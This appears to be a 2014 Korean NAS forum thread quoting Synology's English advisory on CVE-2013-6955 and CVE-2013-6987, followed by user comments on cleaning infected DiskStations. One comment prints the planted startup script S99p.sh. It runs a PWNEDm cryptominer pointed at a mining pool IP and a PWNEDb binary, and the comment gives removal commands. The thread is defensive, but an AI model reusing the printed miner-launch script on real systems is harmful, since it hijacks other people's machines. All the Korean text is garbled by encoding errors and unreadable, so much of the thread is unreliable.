ÃÖ±Ù ÇØÅ· °ü·ÃÀ¸·Î ½Ã³î·ÎÁö·ÎºÎÅÍÀÇ °øÁö¸ÞÀÏ

   Á¶È¸ 6963   Ãßõ 1    

DSM Important UpdateDear Synology users,

Synology¢ç?confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly.

The followings are possible symptoms to appear on affected DiskStation and RackStation:

Exceptionally high CPU usage detected in Resource Monitor:
CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their namesAppearance of non-Synology folder:
An automatically created shared folder with the name ¡°startup¡±, or a non-Synology folder appearing under the path of ¡°/root/PWNED¡±Redirection of the Web Station:
¡°Index.php¡± is redirected to an unexpected pageAppearance of non-Synology CGI program:
Files with meaningless names exist under the path of ¡°/usr/syno/synoman¡±Appearance of non-Synology script file:
Non-Synology script files, such as?¡°S99p.sh¡±, appear under the path of ¡°/usr/syno/etc/rc.d¡±

If users identify any of above situation, they are strongly encouraged to do the following:

For DiskStation or RackStation running on DSM 4.3, please follow the instruction?here?to REINSTALL?DSM 4.3-3827For DiskStation or RackStation running on DSM 4.0, it¡¯s recommended to REINSTALL DSM 4.0-2259 or onward from Synology?Download CenterFor DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it¡¯s recommended to REINSTALL DSM 4.2-3243 or onward from Synology?Download Center

For other users who haven¡¯t encountered above symptoms, it is recommended to go to
DSM > Control Panel > DSM Update?page, update to versions above to protect DiskStation from malicious attacks.

Synology has taken immediate actions to fix vulnerability at the point of identifying malicious attacks. As proliferation of cybercrime and increasingly sophisticated malware evolves, Synology continues to casting resources mitigating threats and dedicates to providing the most reliable solutions for users. If users still notice their DiskStation behaving suspiciously after being upgraded to the latest DSM version, please contact?********@********.com.

Sincerely,
Synology Development Team

?Copyright ? 2014 Synology Inc. All Rights Reserved. All other product names and company names
or logos mentioned in the e-mail are the properties of their respective ownerswww.synology.comPrivacy Policy
벌써 50대
ªÀº±Û Àϼö·Ï ½ÅÁßÇÏ°Ô.
¿À³ª±â 2014-02
°ÅÀÇ ÀüºÎ ÇØ´ç»çÇ×ÀÌ À־ Å«ÀÏÀÌ³×¿ä ¤Ì.¤Ì; Á¤Ç°À» »ç¿ëÇÏÀÚ´Ï µ·°ú ½ºÆåÀÌ ¾Èµû¶óÁÖ°í..
ÀÏ´Ü ¾Æ·¡Ã³·³ ÇØÁÖ¸é CPU»ç¿ëÀ²À» µÇµ¹¸± ¼ö ÀÖ½À´Ï´Ù.

## S99p.sh¸¦ ã¾Æ¼­ ³»¿ë È®ÀÎÇÏ°í Áö¿ó´Ï´Ù. ³»¿ë¿¡¼­ È®ÀεǴ PWNED´Â ¼Ò½ÉÇÏ°Ô À̸§À» ¹Ù²å¾î¿ä.
> cd /
> find / -name S99p.sh
/usr/syno/etc.defaults/rc.d/S99p.sh
> cat /usr/syno/etc.defaults/rc.d/S99p.sh
#!/bin/sh
su -c "cd /PWNED && ./PWNEDm -o 'stratum+tcp://46.244.18.176:9555' &" -s /bin/sh smmsp
su -c "cd /PWNED && ./PWNEDb &" -s /bin/sh smmsp
>mv PWNED PWNED_bak
>rm /usr/syno/etc.defaults/rc.d/S99p.sh

## CPU¸¦ Á¡°ÅÇÏ´Â ¹é±×¶ó¿îµå ÇÁ·Î¼¼½º¸¦ ã¾Æº¾´Ï´Ù.
>find /proc -name "stat" | xargs grep "httpd-log.pid"
## À§ °Ë»ö °á°ú¿¡¼­ ¸ÇÀ§ ÆÄÀÏ(PID)À» killÇÏ¸é ³ª¸ÓÁöµµ killµË´Ï´Ù.
>kill °Ë»öµÈ PID

¿øÃÊÀûÀÎ ÇØ°á¹æ¹ýÀ» ¾Æ½Ã´Â ´É·ÂÀÚ²²¼± Á¤º¸ °øÀ¯Á» ºÎŹµå¸³´Ï´Ù! (__)
     
°­¼ºÁø00 2014-02
º¸¾È±¸¸ÛÀÌ ÆÄÀϽºÅ×ÀÌ¼Ç ÂÊ cgi ¶ó°í ÇÏ´õ±º¿ä.

Á¤Ç° À¯Àú¶ó¸é. ÃֽŹöÁ¯ ¾÷µ¥ÀÌÆ® ÇÏ¸é °£´ÜÈ÷ ÇØ°áµÇÁö¸¸.
ÇØ³î »ç¿ëÁßÀ̶ó¸é ¾î¿ ¼ö ¾øÀÌ

¿ÜºÎÆ÷Æ® ¿ÀÇÂÀ» Æ÷±â Çϰųª.. ÆÄÀϽºÅ×À̼ÇÀ» Æ÷±âÇϰųª..
ÀÌ·¸°Ô µÑ Áß Çϳª´Â Æ÷±â Çؾ߸¸ ÇÕ´Ï´Ù.

-----
ÆÄÀϽºÅ×ÀÌ¼Ç ÀÛµ¿ ¸·´Â ¹æ¹ýÀº ¾Æ·¡ ±Û¿¡ ÀÖ½À´Ï´Ù.

http://www.2cpu.co.kr/bbs/board.php?bo_table=nas&wr_id=1988
          
±èÁØÀ¯ 2014-02
Á¤Ç° »ç¿ëÀÚ¶ó....
ÀÌö¿ì275 2014-02
¿ä±â ¿Ã¶ó¿Â cgi À̸§ ±³Ã¼ÇÏ´Â ¹æ¹ýÀ¸·Î ÀÏ´Ü È¸ÇÇÇß±¸¿ä. (Àú´Â imageSelector.cgi Çϳª¹Û¿¡ ÀÏÄ¡ÇÏ´Â°Ô ¾ø´õ±º¿ä 4.2¶ó¼­ ±×·±°¡?)

/usr/syno/etc.defaults/rc.d/S99p.sh ÆÄÀÏ
PWNED Æú´õ
lolz Æú´õ
/etc/rc.local ÆÄÀÏ

ÀÏ´ÜÀº ±×³É À̸§ ¹Ù²ã³ù³×¿ä.
¹ÚÁ¾·É 2014-02
¸¸¾à lolz ·Î °É·È´Ù¸é top µîÀ» ½ÇÇàÇÏ½Ã¸é ±× Æú´õ¿¡ ÀÖ´ø °É·Î ½ÇÇà µÇ´Â µí Çϱ⵵ Çϳ׿ä..
Æú´õ Áö¿ì°í cgi À̸§µé ¹Ù²Ù°í ¿ì¼± Àӽ÷ΠÇ߳׿ä. Àú´Â .. 4´ë µ¹¸®´Â ÁßÀε¥ ¾÷µ¥ÀÌÆ® ¾ÈÇß´ø°Ô °É¸°°Å °°´õ±º¿ä.
Àӽ÷ΠÇϱä ÇßÁö¸¸.. ¾ÆÁ÷µµ ºÒ¾ÈÇÕ´Ï´Ù.

ºÎÆà USB ¸¦ »õ·Î ÀÛ¼º Çϼż­ ÇÏ½Ã±æ ±ÇÇص帳´Ï´Ù. ¸ÞÀÎÀ¸·Î ¾²´ø °Ô ºÎÆÃÇÒ ¶§ º¸´Ï lolz ã´Â°Å °°´õ±º¿ä..
¿ì¼± ºÎÆà USB ºÎÅÍ »õ·Î ¸¸µå½Ã±æ....
     
¼Û°­¹Î 2014-02
¿Â°® rcÆÄÀÏ .profile¿¡ lolz°ü·Ã ½ºÅ©¸³Æ®µéÀÌ À¯ÀԵǾî ÀÖ´õ¶ó±¸¿ä
Àú´Â ¸®¼Ò½º ¸ð´ÏÅ͵µ ¾ÈµÇ°í Á¤»óÀûÀ¸·Î »ç¿ëÀÌ ºÒ°¡ÇÏ¿© À缳ġ Çß½À´Ï´Ù.


NAS
Á¦¸ñPage 289/307
2014-05   4984230   Á¤ÀºÁØ1
2015-12   1520213   ¹é¸Þ°¡
2014-02   13814   ´ÚÅ͵¶
2014-02   4479   ¾Ö±³Äá
2014-02   5534   Ç㼺ÈÆ
2014-02   15173   µÅÁöÅнº
2014-02   4664   ¾Ö±³Äá
2014-02   5876   ¼º±â»ç
2014-02   6899   ¿À³ª±â
2014-02   5649   ¼º¹Ù¿À·Î
2014-02   5732   ¸¸°õÀÌ
2014-02   4817   Ryun
2014-02   5281   ´ÏÆ÷
2014-02   11728   ¿¡µå¾ÆÀÎ
2014-02   4268   ÀÌÇØÂù
2014-02   5616   ´ÞºÀÀÌ
2014-02   4845   ±èÈÆ1
2014-02   6205   ´ÏÆ÷
2014-02   5684   µÅÁöÅнº
2014-02   6854   ¼Û»óº´
2014-02   6202   ¼Û°­¹Î
2014-02   6964   ±èÁØÀ¯